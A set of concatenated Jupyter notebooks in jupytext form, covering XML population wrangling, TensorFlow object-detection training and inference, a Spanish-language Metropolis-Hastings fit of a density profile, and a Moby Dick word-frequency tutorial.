# NOTE(review): the bare `except: next` clauses silently skip entries with
# a missing <population>; `next` here is just a reference to the builtin
# (a no-op), presumably `continue`/`pass` was intended — verify.
city_population=[]
for country in document.iterfind('country'):
    for state in country.iterfind('province'):
        for city in state.iterfind('city'):
            try:
                city_population.append((city.find('name').text, float(city.find('population').text)))
            except:
                next
    for city in country.iterfind('city'):
        try:
            city_population.append((city.find('name').text, float(city.find('population').text)))
        except:
            next

# ## 10 cities with the largest population
# NOTE(review): sort_index(by=...) is long-removed pandas API; today this
# would be sort_values('Population', ascending=False).
df = pd.DataFrame(city_population, columns=['City', 'Population'])
#df.info()
df.sort_index(by='Population', ascending=False).head(10)

# +
# Aggregate country populations (country node plus nested provinces/cities),
# then apportion them to ethnic groups by the 'percentage' attribute.
ethnic_population={}
country_population={}
for country in document.iterfind('country'):
    try:
        country_population[country.find('name').text]= float(country.find('population').text)
    except:
        next
    # NOTE(review): `iterfind('province' or 'state')` evaluates the string
    # expression `'province' or 'state'` to just 'province', so 'state'
    # elements are never visited — almost certainly a bug to fix by looping
    # over both tags explicitly.
    for state in country.iterfind('province' or 'state'):
        try:
            country_population[country.find('name').text] += float(state.find('population').text)
        except:
            next
        for city in state.iterfind('city'):
            try:
                country_population[country.find('name').text] += float(city.find('population').text)
            except:
                next

for country in document.iterfind('country'):
    for ethnicgroup in country.iterfind('ethnicgroup'):
        try:
            if ethnicgroup.text in ethnic_population:
                ethnic_population[ethnicgroup.text] += country_population[country.find('name').text]*float(ethnicgroup.get('percentage'))/100
            else:
                ethnic_population[ethnicgroup.text] = country_population[country.find('name').text]*float(ethnicgroup.get('percentage'))/100
        except:
            next
# -

# ## 10 ethnic groups with the largest overall populations
# (sum of best/latest estimates over all countries)
pd.DataFrame(sorted(ethnic_population.items(), key=lambda x:x[1], reverse=True)[:10], columns=['Ethnic_Groups', 'Population'])

# Collect river name/length/country triples (first step of exercise 4a).
rivers_list=[]
rivers_df = pd.DataFrame()
for rivers in document.iterfind('river'):
    try:
        rivers_list.append({'name':rivers.find('name').text, 'length':rivers.find('length').text, 'country':rivers.find('located').attrib['country']})
    except:
        next
rivers_list
Week_1/DATA_WRANGLING/WORKING_WITH_DATA_IN_FILES/data_wrangling_xml/data_wrangling_xml/.ipynb_checkpoints/sliderule_dsi_xml_exercise-checkpoint.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + [markdown] id="view-in-github" colab_type="text" # <a href="https://colab.research.google.com/github/fyousseff/youss/blob/master/object_detection_training.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # + id="xPtQzslfLM8W" pip list # + colab={"base_uri": "https://localhost:8080/"} id="R7HlSlxeLQrT" outputId="cebf0160-ac8d-4278-b378-7dffd0593c65" # !git clone https://github.com/tensorflow/models.git # + id="oyPKc6vbFv6E" # + colab={"base_uri": "https://localhost:8080/"} id="PZdHvZBrMXMa" outputId="aa221a7d-3e99-40b7-c626-7429ca693fe7" # cd /content/models/research # + id="CxIJIoGYNQow" # !protoc object_detection/protos/*.proto --python_out=. # + colab={"base_uri": "https://localhost:8080/"} id="rHPxbE_uNRC_" outputId="ed28313a-e1ed-4a99-84eb-546d86afd88d" # !git clone https://github.com/cocodataset/cocoapi.git # + colab={"base_uri": "https://localhost:8080/"} id="rGIdbGZ1NSft" outputId="504ede88-32f9-4e45-8f64-9154f6fd381e" # cd cocoapi/PythonAPI # + id="kZVhYVXKNUUA" colab={"base_uri": "https://localhost:8080/"} outputId="32fcadf7-496d-430a-bf61-d517cb45b713" # !make # + id="hbMRVcY7NV_g" # cp -r pycocotools /content/models/research # + colab={"base_uri": "https://localhost:8080/"} id="HzPFTvflNatO" outputId="91483584-3497-46ed-cee3-aeb95b5c0b90" # cd .. # + id="GIsePVSmNeQR" # cp object_detection/packages/tf2/setup.py . # + id="nFD3EiyJNkIj" colab={"base_uri": "https://localhost:8080/"} outputId="e4ba511a-a187-40e2-cf7d-2082ab338893" # !python -m pip install . 
# + id="vgeq3qvXNmy0" # !python object_detection/builders/model_builder_tf2_test.py # + id="6TN7yJbRHXjW" # + colab={"base_uri": "https://localhost:8080/"} id="lidb7zbmOGBK" outputId="c350fca7-83f0-46c3-e75e-4f367357d6a1" # !wget http://download.tensorflow.org/models/object_detection/tf2/20200711/ssd_resnet50_v1_fpn_640x640_coco17_tpu-8.tar.gz # + colab={"base_uri": "https://localhost:8080/"} id="IjSiSZpcOVXz" outputId="e3356401-eadd-412f-f96a-0c8a5b2356e7" # ! tar -xvf ssd_resnet50_v1_fpn_640x640_coco17_tpu-8.tar.gz # + colab={"base_uri": "https://localhost:8080/"} id="FYZkPMGNJtx2" outputId="0126d255-32de-4b0d-ec57-9d4a1a89c257" # !python generate_tfrecord.py -x /content/workspace/training_demo/images/train -l /content/workspace/training_demo/annotations/label_map.pbtxt -o /content/workspace/training_demo/annotations/train.record # + colab={"base_uri": "https://localhost:8080/"} id="ZaATYcOxUnc3" outputId="5bea6900-0a18-44e0-a351-d0c6962fc9c3" # !python generate_tfrecord.py -x /content/workspace/training_demo/images/test -l /content/workspace/training_demo/annotations/label_map.pbtxt -o /content/workspace/training_demo/annotations/test.record # + id="P3J9tFOeVoB2" # !python model_main_tf2.py --model_dir=models/my_ssd_resnet50_v1_fpn --pipeline_config_path=models/my_ssd_resnet50_v1_fpn/pipeline.config # + id="fgIqEGCoVtZW" # !python exporter_main_v2.py --input_type image_tensor --pipeline_config_path /content/workspace/training_demo/models/my_ssd_resnet50_v1_fpn/pipeline.config --trained_checkpoint_dir /content/workspace/training_demo/models/my_ssd_resnet50_v1_fpn --output_directory /content/workspace/training_demo/exported-models # + [markdown] id="AKmIetvDQRZV" # # New Section # + [markdown] id="NVtyt-KROqJk" # Object Detection (On Image) From TF2 Saved Model # # + id="rPm9hlskpJfb" """ Object Detection (On Image) From TF2 Saved Model ===================================== """ import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # Suppress TensorFlow logging (1) 
import pathlib
import tensorflow as tf
import cv2
import argparse
from google.colab.patches import cv2_imshow

# Enable GPU dynamic memory allocation so TF does not grab all GPU RAM up front.
gpus = tf.config.experimental.list_physical_devices('GPU')
for gpu in gpus:
    tf.config.experimental.set_memory_growth(gpu, True)

# PROVIDE PATH TO IMAGE DIRECTORY
IMAGE_PATHS = '/content/workspace/training_demo/images/test/playing_card.e7ce63fa-123b-11ec-8fc8-9829a63df29a.jpg'

# PROVIDE PATH TO MODEL DIRECTORY
PATH_TO_MODEL_DIR = '/content/workspace/training_demo/exported-models'

# PROVIDE PATH TO LABEL MAP
PATH_TO_LABELS = '/content/workspace/training_demo/annotations/label_map.pbtxt'

# PROVIDE THE MINIMUM CONFIDENCE THRESHOLD
MIN_CONF_THRESH = float(0.60)

# LOAD THE MODEL
import time
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as viz_utils

PATH_TO_SAVED_MODEL = PATH_TO_MODEL_DIR + "/saved_model"

print('Loading model...', end='')
start_time = time.time()

# LOAD SAVED MODEL AND BUILD DETECTION FUNCTION
detect_fn = tf.saved_model.load(PATH_TO_SAVED_MODEL)

end_time = time.time()
elapsed_time = end_time - start_time
print('Done! Took {} seconds'.format(elapsed_time))

# LOAD LABEL MAP DATA FOR PLOTTING (maps class ids -> human-readable names)
category_index = label_map_util.create_category_index_from_labelmap(PATH_TO_LABELS,
                                                                    use_display_name=True)

import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
import warnings
warnings.filterwarnings('ignore')   # Suppress Matplotlib warnings


def load_image_into_numpy_array(path):
    """Load an image from file into a numpy array.

    Puts image into numpy array to feed into tensorflow graph.
    Note that by convention we put it into a numpy array with shape
    (height, width, channels), where channels=3 for RGB.

    Args:
      path: the file path to the image

    Returns:
      uint8 numpy array with shape (img_height, img_width, 3)
    """
    return np.array(Image.open(path))


print('Running inference for {}... '.format(IMAGE_PATHS), end='')

image = cv2.imread(IMAGE_PATHS)
image_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image_expanded = np.expand_dims(image_rgb, axis=0)
# NOTE(review): image_rgb/image_expanded are computed but the BGR `image` is what
# is fed to the model below — confirm whether the exported model expects RGB.

# The input needs to be a tensor, convert it using `tf.convert_to_tensor`.
input_tensor = tf.convert_to_tensor(image)
# The model expects a batch of images, so add an axis with `tf.newaxis`.
input_tensor = input_tensor[tf.newaxis, ...]

# input_tensor = np.expand_dims(image_np, 0)
detections = detect_fn(input_tensor)

# All outputs are batches tensors.
# Convert to numpy arrays, and take index [0] to remove the batch dimension.
# We're only interested in the first num_detections.
num_detections = int(detections.pop('num_detections'))
detections = {key: value[0, :num_detections].numpy()
              for key, value in detections.items()}
detections['num_detections'] = num_detections

# detection_classes should be ints.
detections['detection_classes'] = detections['detection_classes'].astype(np.int64)

image_with_detections = image.copy()

# SET MIN_SCORE_THRESH BASED ON YOU MINIMUM THRESHOLD FOR DETECTIONS
# NOTE(review): MIN_CONF_THRESH (0.60) is defined above but 0.5 is hard-coded
# here — consider passing min_score_thresh=MIN_CONF_THRESH.
viz_utils.visualize_boxes_and_labels_on_image_array(
    image_with_detections,
    detections['detection_boxes'],
    detections['detection_classes'],
    detections['detection_scores'],
    category_index,
    use_normalized_coordinates=True,
    max_boxes_to_draw=200,
    min_score_thresh=0.5,
    agnostic_mode=False)

print('Done')
# DISPLAYS OUTPUT IMAGE
cv2_imshow(image_with_detections)
# CLOSES WINDOW ONCE KEY IS PRESSED

# + id="qOrWmwE1Np1J"


# + [markdown] id="uiZ8FhC5QhVG"
# detect object live

# + id="Cguu5lCHOxpz"
import numpy as np
import os
import six.moves.urllib as urllib
import sys
import tarfile
import tensorflow as tf
import zipfile

from collections import defaultdict
from io import StringIO
from matplotlib import pyplot as plt
from PIL import Image
from IPython.display import display

from object_detection.utils import ops as utils_ops
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util

# + id="fU64ztJEQoq1"
# patch tf1 into `utils.ops` (the API's ops module still references the TF1 namespace)
utils_ops.tf = tf.compat.v1

# Patch the location of gfile
tf.gfile = tf.io.gfile


# + id="aSyktlDSQuQ5"
def load_model(model_name):
    """Download a pretrained detection model from the TF model zoo and return
    its 'serving_default' inference signature.

    Args:
      model_name: zoo model name, e.g. 'ssd_mobilenet_v1_coco_2017_11_17'.

    Returns:
      A callable ConcreteFunction mapping an image batch tensor to detections.
    """
    base_url = 'http://download.tensorflow.org/models/object_detection/'
    model_file = model_name + '.tar.gz'
    model_dir = tf.keras.utils.get_file(
        fname=model_name,
        origin=base_url + model_file,
        untar=True)

    model_dir = pathlib.Path(model_dir)/"saved_model"

    model = tf.saved_model.load(str(model_dir))
    model = model.signatures['serving_default']

    return model


# + colab={"base_uri": "https://localhost:8080/", "height": 35} id="uxb4yeuCSvJi" outputId="7e3b4dc4-7724-45a0-c577-9163ff286876"
pwd

# + [markdown] id="mgfe5XSrQxsZ"
# ### Loading label map
# Label maps map indices to category names, so that when our convolution network predicts `5`, we know that this corresponds to `airplane`.  Here we use internal utility functions, but anything that returns a dictionary mapping integers to appropriate string labels would be fine

# + id="PQFGI2ugQyVJ"
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = '/content/models/research/object_detection/data/mscoco_label_map.pbtxt'
category_index = label_map_util.create_category_index_from_labelmap(PATH_TO_LABELS, use_display_name=True)

# + id="-0E1ZPkPQ4Td"
# Load the custom fine-tuned model exported earlier and grab its serving signature.
detection_model = tf.saved_model.load("/content/workspace/training_demo/exported-models/playcardphone/saved_model")
detection_model = detection_model.signatures['serving_default']

# + [markdown] id="PnOlzIoJQ83t"
# # Check the model's input signature, it expects a batch of 3-color images of type uint8:

# + colab={"base_uri": "https://localhost:8080/"} id="gVPNosp5Q-7h" outputId="7e69a31f-f4bd-4b0b-e678-5e69af9c912e"
print(detection_model.inputs)

# + [markdown] id="LqNDvdryRBPy"
#
#
# ```
# # This is formatted as code
# ```
#
# And retuns several outputs:

# + colab={"base_uri": "https://localhost:8080/"} id="dKhksxk1RDEn" outputId="40113c25-7504-403c-c648-3576f00692ac"
detection_model.output_dtypes

# + id="IOBIdgHyREc4"
detection_model.output_shapes


# + [markdown] id="iSzWfz6WRG0O"
# [link text](https://)Add a wrapper function to call the model, and cleanup the outputs:

# + id="yMNDivp7RJKU"
def run_inference_for_single_image(model, image):
    """Run the detection model on one image and post-process the raw outputs.

    Args:
      model: a serving-signature callable returned by tf.saved_model.load(...).
      image: HxWx3 uint8 numpy array (single image, no batch dimension).

    Returns:
      dict with numpy arrays 'detection_boxes', 'detection_classes' (int64),
      'detection_scores', 'num_detections', and optionally
      'detection_masks_reframed' for mask models.
    """
    image = np.asarray(image)
    # The input needs to be a tensor, convert it using `tf.convert_to_tensor`.
    input_tensor = tf.convert_to_tensor(image)
    # The model expects a batch of images, so add an axis with `tf.newaxis`.
    input_tensor = input_tensor[tf.newaxis,...]

    # Run inference
    output_dict = model(input_tensor)

    # All outputs are batches tensors.
    # Convert to numpy arrays, and take index [0] to remove the batch dimension.
    # We're only interested in the first num_detections.
    num_detections = int(output_dict.pop('num_detections'))
    output_dict = {key:value[0, :num_detections].numpy()
                   for key,value in output_dict.items()}
    output_dict['num_detections'] = num_detections

    # detection_classes should be ints.
    output_dict['detection_classes'] = output_dict['detection_classes'].astype(np.int64)

    # Handle models with masks:
    if 'detection_masks' in output_dict:
        # Reframe the the bbox mask to the image size.
        detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(
            output_dict['detection_masks'], output_dict['detection_boxes'],
            image.shape[0], image.shape[1])
        detection_masks_reframed = tf.cast(detection_masks_reframed > 0.5,
                                           tf.uint8)
        output_dict['detection_masks_reframed'] = detection_masks_reframed.numpy()

    return output_dict


# + id="XGm0B3o1RK3Y"
import cv2
# NOTE(review): cv2.VideoCapture(0)/cv2.imshow need a local display; they will
# not work inside Colab (use cv2_imshow on still frames there instead).
cap = cv2.VideoCapture(0)
# or cap = cv2.VideoCapture("<video-path>")

def run_inference(model, cap):
    """Continuously read frames from `cap`, run detection, and display the
    annotated frames until 'q' is pressed (releases the capture on exit)."""
    while cap.isOpened():
        ret, image_np = cap.read()
        # Actual detection.
        output_dict = run_inference_for_single_image(model, image_np)
        # Visualization of the results of a detection.
        vis_util.visualize_boxes_and_labels_on_image_array(
            image_np,
            output_dict['detection_boxes'],
            output_dict['detection_classes'],
            output_dict['detection_scores'],
            category_index,
            instance_masks=output_dict.get('detection_masks_reframed', None),
            use_normalized_coordinates=True,
            line_thickness=8)
        cv2.imshow('object_detection', cv2.resize(image_np, (800, 600)))
        if cv2.waitKey(25) & 0xFF == ord('q'):
            cap.release()
            cv2.destroyAllWindows()
            break

run_inference(detection_model, cap)

# + id="6w5hwVbxVqaP"


# + colab={"base_uri": "https://localhost:8080/", "height": 128} id="0IsQPQtgVHrw" outputId="a2fdf553-2a63-4302-8c6c-d0cc49e8ecaf"
# Fix: the original bare `python vehicle_counting.py` is a Python SyntaxError that
# breaks the whole script (`python` is not an IPython automagic); shell out instead,
# matching the `# !command` convention used throughout this notebook.
# !python vehicle_counting.py

# + id="bp3WDTgTWUiE"
object_detection_training.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 2
#     language: python
#     name: python2
# ---

# %pylab inline
import matplotlib.pyplot as plt
import numpy as np

# +
# True parameters of the density profile; `r` is the LOG-radius grid
# (densities() exponentiates it), so r in [-10, 10] means R in [e^-10, e^10].
alph=0.1
bet=2
log_R_c=np.log(1)
log_rho0=np.log(30)
r=linspace(-10,10,1000)

def densities(alph,bet,log_R_c,log_rho0,r):
    # Double-power-law density profile rho(R) = rho0 / ((R/R_c)^alph * (1 + R/R_c)^bet),
    # evaluated at R = exp(r) with rho0 = exp(log_rho0), R_c = exp(log_R_c).
    rho=np.exp(log_rho0)/(((np.exp(r)/np.exp(log_R_c))**alph)*((1+np.exp(r)/np.exp(log_R_c))**bet))
    return (rho)

# Synthetic "observed" data generated from the true parameters (noise-free).
densdata=densities(alph,bet,log_R_c,log_rho0,r)
scatter(r,np.log(densdata))


# -

def loglikelihood(y_obs, y_model):
    # Gaussian log-likelihood with unit errors: -chi^2/2.
    chi_squared = (1.0/2.0)*sum((y_obs-y_model)**2)
    return (-chi_squared)


# +
# Initialise the Metropolis-Hastings walk from a guess near the true values.
densmodel=[]
alph_walk = empty((0))
bet_walk = empty((0))
log_R_c_walk = empty((0))
log_rho0_walk = empty((0))
logl_walk = empty((0))

alph0=0.19
bet0=2.12
log_R_c0=np.log(1.099)
log_rho00=np.log(31)

alph_walk = append(alph_walk, alph0)
bet_walk = append(bet_walk, bet0)
log_R_c_walk = append(log_R_c_walk, log_R_c0)
log_rho0_walk = append(log_rho0_walk, log_rho00)

densmodel = densities(alph_walk[0],bet_walk[0],log_R_c_walk[0],log_rho0_walk[0],r)
logl_walk = append(logl_walk, loglikelihood(densdata, densmodel))

print 'Los parámetros iniciales fueron'
print 'alph0='+str(alph_walk[0])
print 'bet0='+str(bet_walk[0])
print 'R_c0='+str(log_R_c_walk[0])
print 'rho00='+str(log_rho0_walk[0])
print 'El logaritmo de la función de likelihood es='+str(logl_walk[0])
# -

# Metropolis-Hastings loop: propose a Gaussian step in all 4 parameters at once,
# accept with probability min(1, L'/L).
# NOTE(review): a proposal sigma of 1 is very wide for alph (~0.1) — acceptance
# will be low; consider per-parameter step sizes.
n_iterations = 10000
densprime=[]
for i in range(n_iterations):
    alph0_prime = np.random.normal(alph_walk[i], 1)
    bet0_prime = np.random.normal(bet_walk[i], 1)
    log_R_c0_prime = np.random.normal(log_R_c_walk[i], 1)
    log_rho00_prime = np.random.normal(log_rho0_walk[i], 1)
    densmodel = densities(alph_walk[i],bet_walk[i],log_R_c_walk[i],log_rho0_walk[i],r)
    densprime = densities(alph0_prime,bet0_prime,log_R_c0_prime,log_rho00_prime,r)
    logl_prime = loglikelihood(densdata, densprime)
    logl_init = loglikelihood(densdata, densmodel)
    # Acceptance ratio exp(logL' - logL); >= 1 means the proposal is always taken.
    alpha = exp(logl_prime-logl_init)
    if(alpha>=1.0):
        alph_walk = append(alph_walk,alph0_prime)
        bet_walk = append(bet_walk,bet0_prime)
        log_R_c_walk = append(log_R_c_walk,log_R_c0_prime)
        log_rho0_walk = append(log_rho0_walk,log_rho00_prime)
        logl_walk = append(logl_walk, logl_prime)
    else:
        # Accept a worse proposal with probability alpha; otherwise repeat the
        # current state (standard Metropolis rejection).
        beta = random.random()
        if(beta<=alpha):
            alph_walk = append(alph_walk,alph0_prime)
            bet_walk = append(bet_walk,bet0_prime)
            log_R_c_walk = append(log_R_c_walk,log_R_c0_prime)
            log_rho0_walk = append(log_rho0_walk,log_rho00_prime)
            logl_walk = append(logl_walk, logl_prime)
        else:
            alph_walk = append(alph_walk,alph_walk[i])
            bet_walk = append(bet_walk,bet_walk[i])
            log_R_c_walk = append(log_R_c_walk,log_R_c_walk[i])
            log_rho0_walk = append(log_rho0_walk,log_rho0_walk[i])
            logl_walk = append(logl_walk, logl_init)

# Posterior histograms of each parameter's chain.
# NOTE(review): `normed=True` was removed in matplotlib 3.1 (use `density=True`
# there); it is valid for the Python 2-era matplotlib this notebook targets.
count, bins, ignored =plt.hist(alph_walk, 20, normed=True)
plt.title('Histograma de alpha', fontsize=12)

count, bins, ignored =plt.hist(bet_walk, 20, normed=True)
plt.title('Histograma de beta', fontsize=12)

count, bins, ignored =plt.hist(log_R_c_walk, 20, normed=True)
plt.title('Histograma de log_R_c', fontsize=12)

count, bins, ignored =plt.hist(log_rho0_walk, 20, normed=True)
plt.title('Histograma de log_rho0', fontsize=12)

# Trace of the log-likelihood over the walk (convergence diagnostic).
Plot2=plt.figure(figsize=(10,10))
plot((logl_walk))
plt.title('Evolucion de funcion de error de $\chi^{2}$', fontsize=12)
plt.grid()

# +
# Best-fit parameters = chain state with the maximum log-likelihood.
max_likelihood_id = argmax(logl_walk)
best_alph = alph_walk[max_likelihood_id]
best_bet = bet_walk[max_likelihood_id]
best_log_R_c = log_R_c_walk[max_likelihood_id]
best_log_rho0 = log_rho0_walk[max_likelihood_id]

print 'Los parámetros más probables encontrados fueron'
print 'alph='+str(best_alph)
print 'bet='+str(best_bet)
print 'log_R_c='+str(best_log_R_c)
print 'log_rho0='+str(best_log_rho0)
print '\nLos parámetros originales fueron'
print 'alph='+str(alph)
print 'bet='+str(bet)
print 'log_R_c='+str(log_R_c)
print 'log_rho0='+str(log_rho0)
# -

# Model curve evaluated at the best-fit parameters, for comparison with the data.
denstest=[]
denstest=densities(best_alph,best_bet,best_log_R_c,best_log_rho0,r)
densdata=densities(alph,bet,log_R_c,log_rho0,r) scatter(np.log(r),np.log(densdata)) scatter(np.log(r),np.log(denstest))
.ipynb_checkpoints/MCMC-checkpoint.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# # Frequencies of words in novels: a Data Science pipeline

# <img src="img/moby-dick.jpg" width="350">

# In this code-along session, you will use some basic Natural Language Processing to plot the most frequently occurring words in the novel _Moby Dick_. In doing so, you'll also see the efficacy of thinking in terms of the following Data Science pipeline with a constant regard for process:
# 1. State your question;
# 2. Get your data;
# 3. Wrangle your data to answer your question;
# 4. Answer your question;
# 5. Present your solution so that others can understand it.
#
# For example, what would the following word frequency distribution be from?
#
# <img src="img/d-x.png" width="350">

# ## Pre-steps
#
# Follow the instructions in the README.md to get your system set up and ready to go.

# ## 1. State your question
#
# What are the most frequent words in the novel _Moby Dick_ and how often do they occur?

# ## 2. Get your data

# Your raw data is the text of Melville's novel _Moby Dick_. We can find it at [Project Gutenberg](https://www.gutenberg.org/).
#
# **TO DO:** Head there, find _Moby Dick_ and then store the relevant url in your Python namespace:

# Store url
url = 'https://www.gutenberg.org/files/2701/2701-h/2701-h.htm'

#
# You're going to use [`requests`](http://docs.python-requests.org/en/master/) to get the web data.
# You can find out more in DataCamp's [Importing Data in Python (Part 2) course](https://www.datacamp.com/courses/importing-data-in-python-part-2).
#
# <img src="img/requests.png" width="200">
#
# According to the `requests` package website:
#
# > Requests is one of the most downloaded Python packages of all time, pulling in over 13,000,000 downloads every month. All the cool kids are doing it!
#
# You'll be making a `GET` request from the website, which means you're _getting_ data from it. `requests` make this easy with its `get` function.
#
# **TO DO:** Make the request here and check the object type returned.

# +
# Import `requests`
import requests

# Make the request and check object type
r = requests.get(url)
type(r)
# -

# This is a `Response` object. You can see in the [`requests` kickstart guide](http://docs.python-requests.org/en/master/user/quickstart/) that a `Response` object has an attribute `text` that allows you to get the HTML from it!
#
# **TO DO:** Get the HTML and print the HTML to check it out:

# Extract HTML from Response object and print
html = r.text
#print(html)

# OK! This HTML is not quite what you want. However, it does _contain_ what you want: the text of _Moby Dick_. What you need to do now is _wrangle_ this HTML to extract the novel.

# **Recap:**
#
# * you have now scraped the web to get _Moby Dick_ from Project Gutenberg.
#
# **Up next:** it's time for you to parse the html and extract the text of the novel.

# ## 3. Wrangle your data to answer the question

# ### Part 1: getting the text from the HTML
#
# Here you'll use the package [`BeautifulSoup`](https://www.crummy.com/software/BeautifulSoup/). The package website says:
#
# <img src="img/bs4.png" width="550">
#
#
# **TO DO:** Create a `BeautifulSoup` object from the HTML.

# +
# Import BeautifulSoup from bs4
from bs4 import BeautifulSoup

# Create a BeautifulSoup object from the HTML
soup = BeautifulSoup(html, "html5lib")
type(soup)
# -

# From these soup objects, you can extract all types of interesting information about the website you're scraping, such as title:

# Get soup title
soup.title

# Or the title as a string:

# Get soup title as string
soup.title.string

# Or all URLs found within a page’s < a > tags (hyperlinks):

# Get hyperlinks from soup and check out first 10
soup.findAll('a')[:8]

# What you want to do is to extract the text from the `soup` and there's a souper helpful `.get_text()` method precisely for this.
#
# **TO DO:** Get the text, print it out and have a look at it. Is it what you want?

# Get the text out of the soup and print it
text = soup.get_text()
#print(text)

# Notice that this is now nearly what you want.  You'll need to do a bit more work.

# **Recap:**
#
# * you have scraped the web to get _Moby Dick_ from Project Gutenberg;
# * you have also now parsed the html and extracted the text of the novel.
#
# **Up next:** you'll use Natural Language Processing, tokenization and regular expressions to extract the list of words in _Moby Dick_.

# ### Part 2: Extract words from your text using NLP

# You'll now use `nltk`, the Natural Language Toolkit, to
#
# 1. Tokenize the text (fancy term for splitting into tokens, such as words);
# 2. Remove stopwords (words such as 'a' and 'the' that occur a great deal in nearly all English language texts).
#
# #### Step 1: Tokenize
#
# You want to tokenize your text, that is, split it into a list a words.
#
# To do this, you're going to use a powerful tool called _regular expressions_, or _regex_.
#
# * Example: you have the string 'Peter Piper picked a peck of pickled peppers' and you want to extract from the list of _all_ words in it that start with a 'p'.
#
# The regular expression that matches all words beginning with 'p' is 'p\w+'. Let's unpack this:
#
# * the 'p' at the beginning of the regular expression means that you'll only match sequences of characters that start with a 'p';
# * the '\w' is a special character that will match any alphanumeric A-Z, a-z, 0-9, along with underscores;
# * The '+' tells you that the previous character in the regex can appear as many times as you want in strings that you're trying to match. This means that '\w+' will match arbitrary sequences of alphanumeric characters and underscores.
#
# **You'll now use the built-in Python package `re` to extract all words beginning with 'p' from the sentence 'Peter Piper picked a peck of pickled peppers' as a warm-up.**
#
#

# +
# Import regex package
import re

# Define sentence
sentence = 'peter piper pick a peck of pickled peppers'

# Define regex
ps = 'p\w+'


# Find all words in sentence that match the regex and print them
re.findall(ps, sentence)
# -

# This looks pretty good. Now, if 'p\w+' is the regex that matches words beginning with 'p', what's the regex that matches all words?
#
# **It's your job to now do this for our toy Peter Piper sentence above.**

# Find all words and print them
re.findall('\w+', sentence)

# **TO DO:** use regex to get all the words in _Moby Dick_:

# Find all words in Moby Dick and print several
tokens = re.findall('\w+', text)
tokens[:8]

# **Recap:**
#
# * you have scraped the web to get _Moby Dick_ from Project Gutenberg;
# * you have parsed the html and extracted the text of the novel;
# * you have used tokenization and regular expressions to extract the list of words in _Moby Dick_.
#
# **Up next:** extract the list of words in _Moby Dick_ using `nltk`, the Natural Language Toolkit.
#
# Go get it!

# +
# Import RegexpTokenizer from nltk.tokenize
from nltk.tokenize import RegexpTokenizer

# Create tokenizer
tokenizer = RegexpTokenizer('\w+')

# Create tokens
tokens = tokenizer.tokenize(text)
tokens[:8]
# -

# **TO DO:** Create a list containing all the words in _Moby Dick_ such that all words contain only lower case letters. You'll find the string method `.lower()` handy:

# +
# Initialize new list
words = []

# Loop through list tokens and make lower case
for word in tokens:
    words.append(word.lower())

# Print several items from list as sanity check
words[:8]
# -

# **Recap:**
#
# * you have scraped the web to get _Moby Dick_ from Project Gutenberg;
# * you have parsed the html and extracted the text of the novel;
# * you have used tokenization and regular expressions to extract the list of words in _Moby Dick_.
#
# **Up next:** remove common words such as 'a' and 'the' from the list of words.

# #### Step 2: Remove stop words
#
# It is common practice to remove words that appear a lot in the English language such as 'the', 'of' and 'a' (known as stopwords) because they're not so interesting. For more on all of these techniques, check out our [Natural Language Processing Fundamentals in Python course](https://www.datacamp.com/courses/nlp-fundamentals-in-python).
#
# The package `nltk` has a list of stopwords in English which you'll now store as `sw` and print the first several elements of.
#
# If you get an error here, run the command `nltk.download('stopwords')` to install the stopwords on your system.

# +
# Import nltk
import nltk

# Get English stopwords and print some of them
sw = nltk.corpus.stopwords.words('english')
sw[:5]
# -

# You want the list of all words in `words` that are *not* in `sw`. One way to get this list is to loop over all elements of `words` and add them to a new list if they are *not* in `sw`:

# +
# Initialize new list
words_ns = []

# Add to words_ns all words that are in words but not in sw
for word in words:
    if word not in sw:
        words_ns.append(word)

# Print several list items as sanity check
words_ns[:5]
# -

# **Recap:**
#
# * you have scraped the web to get _Moby Dick_ from Project Gutenberg;
# * you have parsed the html and extracted the text of the novel;
# * you have used tokenization and regular expressions to extract the list of words in _Moby Dick_.
# * you have removed common words such as 'a' and 'the' from the list of words.
#
# **Up next:** plot the word frequency distribution of words in _Moby Dick_.

# ## 4. Answer your question
#
#
# Our question was 'What are the most frequent words in the novel Moby Dick and how often do they occur?'
#
# You can now plot a frequency distribution of words in _Moby Dick_ in two lines of code using `nltk`. To do this,
#
# * Create a frequency distribution object using the function `nltk.FreqDist()`;
# * Using the plot method of the resulting object.

# +
#Import datavis libraries
import matplotlib.pyplot as plt
import seaborn as sns

# Figures inline and set visualization style
# %matplotlib inline
sns.set()

# Create freq dist and plot
freqdist1 = nltk.FreqDist(words_ns)
freqdist1.plot(25)
# -

# **Recap:**
#
# * you have scraped the web to get _Moby Dick_ from Project Gutenberg;
# * you have parsed the html and extracted the text of the novel;
# * you have used tokenization and regular expressions to extract the list of words in _Moby Dick_.
# * you have removed common words such as 'a' and 'the' from the list of words.
# * you have plotted the word frequency distribution of words in _Moby Dick_.
#
# **Up next:** adding more stopwords.
# ### Add more stop words

# +
# Import stopwords from sklearn
# Fix: `sklearn.feature_extraction.stop_words` was deprecated in scikit-learn 0.22
# and removed in 0.24; ENGLISH_STOP_WORDS now lives in sklearn.feature_extraction.text.
from sklearn.feature_extraction.text import ENGLISH_STOP_WORDS

# Add sklearn stopwords to words_sw
sw = set(sw + list(ENGLISH_STOP_WORDS))

# Initialize new list
words_ns = []

# Add to words_ns all words that are in words but not in sw
for word in words:
    if word not in sw:
        words_ns.append(word)

# Create freq dist and plot
freqdist2 = nltk.FreqDist(words_ns)
freqdist2.plot(25)
# -

# ## 5. Present your solution so that others can understand it.
#
